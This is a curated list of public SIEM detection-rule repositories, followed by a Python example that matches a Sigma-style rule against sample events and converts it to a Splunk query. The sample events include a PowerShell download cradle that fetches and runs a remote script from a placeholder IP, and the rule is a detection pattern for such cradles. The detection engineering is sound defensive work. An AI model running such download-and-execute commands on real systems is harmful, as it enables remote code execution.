A curated list of detection rule sources.
We built this during our research for SIEM Rules, your detection engineering AI assistant.
You can find a copy of the following table as a Google Sheet here.
| Source | URL | Language | Product | Summary |
|---|---|---|---|---|
| Elastic Detection Rules | https://github.com/elastic/detection-rules | KQL, EQL, Lucene, ES\|QL | Elastic | Elastic's public detection rules, one TOML file per rule, with the query written in KQL, EQL, Lucene or ES\|QL. Rules are organised by domain (endpoint, cloud, network, ...) and the repository also contains the tooling used to validate and package them. |
| Chronicle Detection Rules | https://github.com/chronicle/detection-rules | YARA-L 2.0 | Google SecOps (Chronicle) | Detection rules written in YARA-L 2.0 for Google Security Operations (formerly Chronicle), covering threat detection across a wide range of log sources. |
| Sigma Rules | https://github.com/SigmaHQ/sigma | Sigma | Sigma | The main SigmaHQ repository: vendor-neutral YAML rules organised by log source (Windows, Linux, cloud, network, ...). A Sigma backend converts a rule into the query language of the target SIEM, which is what makes the rules cross-platform. |
| Anvilogic Armory | https://github.com/anvilogic-forge/armory | Sigma | Anvilogic | Anvilogic Forge's public collection of Sigma-based detection rules, usable for cross-platform threat detection across different security platforms. |
| Panther Labs | https://github.com/panther-labs/panther-analysis/tree/develop/rules | Python | Panther | Panther's detection rules, each a Python `rule(event)` function plus a YAML spec, written for security operations teams detecting threats in cloud and hybrid environments. |
| Splunk Security Content | https://github.com/splunk/security_content | SPL | Splunk | Splunk's SPL-based detections, stored as YAML and grouped into Analytic Stories, covering endpoint, cloud, network and threat-intelligence use cases. |
| Datadog Security Rules | https://docs.datadoghq.com/security/default_rules/ | Proprietary syntax | Datadog | Documentation of the default detection rules shipped with Datadog Cloud SIEM; rule queries use Datadog's log search syntax, which users can also use to build custom rules. |
| Sekoia Detection Rules | https://docs.sekoia.io/xdr/features/detect/built_in_detection_rules/ | Proprietary syntax | Sekoia | Sekoia.io's built-in detection rules, covering a variety of security events with pre-defined detection logic for different environments. |
| Exabeam Content | https://github.com/ExabeamLabs/Content-Doc | JSON-based rules | Exabeam | Exabeam's content repository, with JSON-based detection content for Exabeam's SIEM covering a range of security events and threat-intelligence use cases. |
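The Sigma and Splunk rows above rest on one idea: a Sigma rule is a vendor-neutral description of a detection that a backend turns into a concrete SIEM query. The following is an added example, not code from this list, from SigmaHQ or from any of the vendors in the table. It implements a deliberately small subset of Sigma (field modifiers `contains`, `startswith`, `endswith`, exact match, and `and`/`or`/`not`/parentheses in the condition; `1 of selection*`-style conditions, regex and the `cased` modifier are not supported), runs a constructed rule over constructed process-creation events, and renders the same rule as an SPL search, the way a Splunk backend would. The rule, the events and every field name are hypothetical.

```python
"""Minimal Sigma-subset matcher plus SPL renderer (added example, not SigmaHQ code)."""
import re

# Hypothetical Sigma rule (constructed). The same rule as YAML would read:
#   title: Suspicious PowerShell Download Cradle
#   logsource: {category: process_creation, product: windows}
#   detection:
#     selection:
#       Image|endswith: '\powershell.exe'
#       CommandLine|contains: ['DownloadString', 'Invoke-WebRequest']
#     filter:
#       User|startswith: 'NT AUTHORITY\'
#     condition: selection and not filter
# It is written here as the dict yaml.safe_load would return so the example needs no PyYAML.
RULE = {
    "title": "Suspicious PowerShell Download Cradle",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "Image|endswith": "\\powershell.exe",
            "CommandLine|contains": ["DownloadString", "Invoke-WebRequest"],
        },
        "filter": {"User|startswith": "NT AUTHORITY\\"},
        "condition": "selection and not filter",
    },
}

# Constructed process-creation events; field names follow the Sysmon/Sigma convention.
EVENTS = [
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')\"",
     "User": "CORP\\jdoe"},                      # should fire
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell Invoke-WebRequest -Uri http://192.0.2.10/update.ps1",
     "User": "NT AUTHORITY\\SYSTEM"},            # selection hits, but the filter suppresses it
    {"Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd /c whoami", "User": "CORP\\jdoe"},   # not PowerShell
]


def _split_key(key):
    """'CommandLine|contains' -> ('CommandLine', 'contains'); no modifier -> exact match."""
    field, _, modifier = key.partition("|")
    return field, (modifier or None)


def _match_value(modifier, field_value, pattern):
    # Sigma string matching is case-insensitive unless the `cased` modifier is used.
    fv, p = str(field_value).lower(), str(pattern).lower()
    if modifier == "contains":
        return p in fv
    if modifier == "startswith":
        return fv.startswith(p)
    if modifier == "endswith":
        return fv.endswith(p)
    if modifier is None:
        return fv == p
    raise ValueError(f"unsupported modifier: {modifier}")


def selection_matches(selection, event):
    """All fields of a selection must match (AND); a list of values for one field is an OR."""
    for key, patterns in selection.items():
        field, modifier = _split_key(key)
        if field not in event:
            return False
        values = patterns if isinstance(patterns, list) else [patterns]
        if not any(_match_value(modifier, event[field], p) for p in values):
            return False
    return True


_TOKEN = re.compile(r"\(|\)|[A-Za-z_][A-Za-z0-9_*]*")


def parse_condition(text):
    """Recursive-descent parser for `a and not (b or c)`; precedence: not > and > or."""
    tokens, pos = _TOKEN.findall(text), [0]

    def peek():
        return tokens[pos[0]] if pos[0] < len(tokens) else None

    def take():
        pos[0] += 1
        return tokens[pos[0] - 1]

    def parse_or():
        node = parse_and()
        while peek() == "or":
            take(); node = ("or", node, parse_and())
        return node

    def parse_and():
        node = parse_not()
        while peek() == "and":
            take(); node = ("and", node, parse_not())
        return node

    def parse_not():
        if peek() == "not":
            take(); return ("not", parse_not())
        tok = take()
        if tok == "(":
            node = parse_or()
            if take() != ")":
                raise ValueError("unbalanced parentheses in condition")
            return node
        return ("name", tok)  # a selection/filter name from the detection block

    ast = parse_or()
    if peek() is not None:
        raise ValueError(f"trailing tokens in condition: {tokens[pos[0]:]}")
    return ast


def rule_matches(rule, event):
    """Evaluate the rule's condition against one event."""
    detection = rule["detection"]

    def ev(node):
        kind = node[0]
        if kind == "name":
            return selection_matches(detection[node[1]], event)
        if kind == "not":
            return not ev(node[1])
        left, right = ev(node[1]), ev(node[2])
        return (left and right) if kind == "and" else (left or right)

    return ev(parse_condition(detection["condition"]))


def _spl_quote(value):
    # SPL string literals: escape backslash and double quote.
    return '"' + str(value).replace("\\", "\\\\").replace('"', '\\"') + '"'


def _spl_term(field, modifier, value):
    # Sigma modifiers become SPL wildcards; exact match stays a plain value.
    wild = {"contains": f"*{value}*", "startswith": f"{value}*", "endswith": f"*{value}"}
    return f"{field}={_spl_quote(wild.get(modifier, value))}"


def selection_to_spl(selection):
    clauses = []
    for key, patterns in selection.items():
        field, modifier = _split_key(key)
        terms = [_spl_term(field, modifier, v) for v in (patterns if isinstance(patterns, list) else [patterns])]
        clauses.append(terms[0] if len(terms) == 1 else "(" + " OR ".join(terms) + ")")
    return "(" + " AND ".join(clauses) + ")"


def rule_to_spl(rule):
    """Render the rule's condition as an SPL filter (the job a Sigma Splunk backend does)."""
    detection = rule["detection"]

    def render(node):
        kind = node[0]
        if kind == "name":
            return selection_to_spl(detection[node[1]])
        if kind == "not":
            return "NOT " + render(node[1])
        return "(" + render(node[1]) + f" {kind.upper()} " + render(node[2]) + ")"

    return render(parse_condition(detection["condition"]))


def run(rule=RULE, events=EVENTS):
    """Return the indices of the events the rule fires on."""
    return [i for i, e in enumerate(events) if rule_matches(rule, e)]


if __name__ == "__main__":
    print("events matched:", run())          # expected: [0]
    print("SPL:", rule_to_spl(RULE))
```

Running it matches only the first event: the second is caught by the selection but suppressed by the `filter`, which is exactly the false-positive tuning pattern used throughout the SigmaHQ repository, and the third never matches the `Image` clause. The SPL output shows why the conversion step matters in practice: the backslashes in the Windows paths have to be escaped for Splunk, a detail a hand-translated rule often gets wrong. A real deployment should use a maintained Sigma backend (pySigma/sigma-cli) rather than this subset.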
Feel free to contribute.
Creative Commons Attribution 4.0 International Public License.